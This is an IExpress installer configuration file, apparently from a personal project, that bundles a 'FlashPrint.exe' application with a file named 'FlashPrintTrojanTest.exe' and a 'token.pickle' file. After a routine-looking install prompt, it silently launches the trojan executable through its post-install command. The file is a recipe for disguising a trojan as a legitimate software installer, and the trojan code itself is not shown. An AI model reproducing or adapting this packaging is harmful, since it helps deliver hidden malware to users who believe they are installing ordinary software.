[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=0
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=I
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=Are you sure you want to install this test?
DisplayLicense=
FinishMessage=Done, Aplication Should Start.
TargetName=C:\Users\jonah\OneDrive\Desktop\FlashPrint_Trojan\InstillationFiles\FlashPrintTrojanTest.exe
FriendlyName=FlashPrintTrojanTestInstillation
AppLaunched=FlashPrintTrojanTest.exe
PostInstallCmd=FlashPrintTrojanTest.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="FlashPrint.exe"
FILE1="FlashPrintTrojanTest.exe"
FILE2="token.pickle"
[SourceFiles]
SourceFiles0=D:\
SourceFiles1=C:\Users\jonah\OneDrive\Desktop\FlashPrint_Trojan\ExeFiles\
[SourceFiles0]
%FILE0%=
[SourceFiles1]
%FILE1%=
%FILE2%=
